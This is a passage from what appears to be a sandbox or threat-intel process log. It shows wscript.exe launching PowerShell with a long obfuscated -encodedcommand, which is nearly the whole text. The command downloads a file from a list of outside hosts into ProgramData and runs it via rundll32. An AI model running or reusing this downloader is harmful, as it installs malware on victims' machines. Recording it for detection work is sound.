BFAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZwByAHUAbgB0AGwAaQBuAGcATQBlAHQAaABlAHIALgBnAGUAbwBtAGEAbgB0AGkAYwBUAGgAeQByAG8AaQBkAGUAYQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAMwA2ADMAMAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwBjAEEAYwBnAEIAMQBBAEcANABBAGQAQQBCAHMAQQBHAGsAQQBiAGcAQgBuAEEARQAwAEEAWgBRAEIAMABBAEcAZwBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBsAEEARwA4AEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHAAQQBHAE0AQQBWAEEAQgBvAEEASABrAEEAYwBnAEIAdgBBAEcAawBBAFoAQQBCAGwAQQBHAEUAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEwAbwB0AG0AZQBuAHQATgBlAHAAaAByAG8AZABpAG4AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBVAEEAWQBnAEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAEUAQQBiAEEAQgBwAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAFkAUQBCAHMAQQBDADQAQQBhAFEAQgB6AEEAQQA9AD0ASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGcAQQBMAGcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQARQBBAE4AZwBBAHgAQQBDADQAQQBNAFEAQQA0AEEARABNAEEASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAE0AQQBPAFEAQQB1AEEARABFAEEATwBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGsAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQATgBvAG4AcAB1AG4AYwB0AHUAYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABVAEEATABnAEEAeABBAEQAawBBAE4AQQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABnAEEATQBBAEEAPQAiADsAJABjAG8AdQBuAHQAZQByAHIAbwB1AG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABjAEEATABnAEEAeABBAEQAZwBBAE4AdwBBAHUAQQBEAFkAQQBNAEEAQQA9AHMAaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQATQBBAEwAZwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgBRAEEANQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A" | ||||||
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABsAGEAbgBvAGwAaQBuAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAOABBAGQAZwBCAGwAQQBIAEkAQQBkAEEAQgBvAEEASABJAEEAWgBRAEIAMwBBAEUAdwBBAFkAUQBCAGsAQQBHAGsAQQBaAGcAQgA1AEEAQwA0AEEAWgBRAEIAaABBAEgASQBBAGQAQQBCAG8AQQBBAD0APQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBZAFEAQgA1AEEASABVAEEAYwB3AEIAbABBAEgATQBBAFQAQQBCAGgAQQBHAEkAQQBiAHcAQgB5AEEARwBFAEEAYgBnAEIAMABBAEMANABBAGQAQQBCAHAAQQBIAEkAQQBiAHcAQgBzAEEAQQA9AD0ARABUAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBnAEEAdQBBAEQAWQBBAE8AUQBBAHUAQQBEAFEAQQBOAHcAQQB1AEEARABjAEEATwBBAEEAPQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGcAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAPQAiADsAJABjAHIAdQBzAHQAYQBjAGUAbwBsAG8AZwBpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE4AZwBBAHUAQQBEAEUAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAFkAQQBOAFEAQQA9AE4AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATwBRAEEAPQBOAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEcAVQBBAGMAdwBCAGoAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEAVQBBAEIAeQBBAEcAVQBBAGMAdwBCADAAQQBHAGsAQQBaAHcAQgBwAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAHcAQQBiAHcAQgBoAEEARwA0AEEATgBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAUQBBAEwAZwBBAHgAQQBEAEEAQQBNAHcAQQA9ACIAOwAkAHMAdABvAHIAYQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABZAEEATABnAEEAMQBBAEQAVQBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEAegBVAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATgBRAEEAdQBBAEQAawBBAE4AUQBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBnAEEAdwBBAEQAWQBBAHoAVQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAUQBCADIAQQBHAFUAQQBkAEEAQgB2AEEARwA0AEEAWgBRAEIAUwBBAEcARQBBAGIAUQBCAHoAQQBIAFEAQQBaAFEAQgBoAEEARwBRAEEATABnAEIAcwBBAEgAUQBBAFoAQQBCAGgAQQBBAD0APQB6AFUAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGwAQQBHADQAQQBkAEEAQgB5AEEARwBFAEEAYQBRAEIAdQBBAEMANABBAGEAUQBCAHoAQQBBAD0APQAiADsAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAEEAQQBMAGcAQQA0AEEARABnAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBOAEEAQQB6AEEAQwA4AEEAVwBRAEIAcQBBAEYASQBBAEwAdwBCAEgAQQBFADgAQQBkAGcAQgA0AEEARQBVAEEAcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABFAEEATQB3AEEANABBAEMANABBAE8AQQBBADIAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATAB3AEIAcABBAEcARQBBAEwAdwBCAEsAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE8AQQBBAHUAQQBEAFUAQQBOAHcAQQB1AEEARABFAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAHcAQgBNAEEASABBAEEATQBRAEIAcQBBAEgAWQBBAEwAdwBCAFQAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBHADAAQQBNAEEAQgBHAEEARwBjAEEAUgB3AEEAMwBBAEcAcwBBAGIAZwBBAD0AcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQB3AEEAVwBBAEIAdABBAEQASQBBAE4AUQBCAFQAQQBHAEUAQQBTAEEAQgBOAEEARgBvAEEATQB3AEEAPQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHQAQQBIAEEAQQBhAEEAQgBJAEEARQBnAEEAYwBRAEIARwBBAEUAdwBBAFEAdwBCAHIAQQBGAGcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB0AGEAdABhAHUAcABhAEQAaQBnAGkAdABhAGwAaQBuACAAaQBuACAAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAAtAHMAcABsAGkAdAAgACIAcQBzAHQAZgAiACkAIAB7AHQAcgB5ACAAewAkAFMAYQBuAGcAdQBpAHMAdQBnAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAFEAQQAwAEEARABRAEEATABnAEEAMABBAEQAUQBBAE4AcgBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCADMAQQBHADgAQQBjAGcAQgByAEEASABNAEEATABnAEIAbgBBAEcAawBBAFoAZwBCADAAQQBIAE0AQQBOAHIAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGcAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQAyAEEAQQA9AD0ATgByAGQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AUQBBAHcAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEANABBAEQATQBBACIAOwAkAHAAaABvAGwAaQBvAHQAYQBVAG4AYQBnAHIAZQBlAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAYQB0AGEAdQBwAGEARABpAGcAaQB0AGEAbABpAG4AKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABwAGgAbwBsAGkAbwB0AGEAVQBuAGEAZwByAGUAZQBpAG4AZwAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABnAHIAdQBuAHQAbABpAG4AZwBNAGUAdABoAGUAcgAuAGcAZQBvAG0AYQBuAHQAaQBjAFQAaAB5AHIAbwBpAGQAZQBhADsAJAB3AGgAbwBsAGUAcwBhAGwAZQBuAGUAcwBzAEkAbgB0AHUAYgBhAHQAbwByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYwBnAEIAbABBAEgAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgB0AEEARwBrAEEAZABBAEIAMABBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBZAGcAQgBsAEEASABRAEEATQBBAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATwBBAEEAdQBBAEQAWQBBAE8AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABZAEEATwBRAEEAPQBNAEEAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBZAHcAQgBqAEEARwBrAEEAWgBBAEIAbABBAEcANABBAGQAQQBCAHMAQQBIAGsAQQBMAGcAQgAzAEEARwBVAEEAWgBBAEIAawBBAEcAawBBAGIAZwBCAG4AQQBBAD0APQAiADsAJABVAG4AZABlAHIAYwByAHUAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAGcAQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZwByAHUAbgB0AGwAaQBuAGcATQBlAHQAaABlAHIALgBnAGUAbwBtAGEAbgB0AGkAYwBUAGgAeQByAG8AaQBkAGUAYQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAMwA2ADMAMAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwBjAEEAYwBnAEIAMQBBAEcANABBAGQAQQBCAHMAQQBHAGsAQQBiAGcAQgBuAEEARQAwAEEAWgBRAEIAMABBAEcAZwBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBsAEEARwA4AEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHAAQQBHAE0AQQBWAEEAQgBvAEEASABrAEEAYwBnAEIAdgBBAEcAawBBAFoAQQBCAGwAQQBHAEUAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEwAbwB0AG0AZQBuAHQATgBlAHAAaAByAG8AZABpAG4AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBVAEEAWQBnAEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAEUAQQBiAEEAQgBwAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAFkAUQBCAHMAQQBDADQAQQBhAFEAQgB6AEEAQQA9AD0ASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGcAQQBMAGcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQARQBBAE4AZwBBAHgAQQBDADQAQQBNAFEAQQA0AEEARABNAEEASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAE0AQQBPAFEAQQB1AEEARABFAEEATwBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGsAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQATgBvAG4AcAB1AG4AYwB0AHUAYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABVAEEATABnAEEAeABBAEQAawBBAE4AQQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABnAEEATQBBAEEAPQAiADsAJABjAG8AdQBuAHQAZQByAHIAbwB1AG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABjAEEATABnAEEAeABBAEQAZwBBAE4AdwBBAHUAQQBEAFkAQQBNAEEAQQA9AHMAaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQATQBBAEwAZwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgBRAEEANQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A" |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |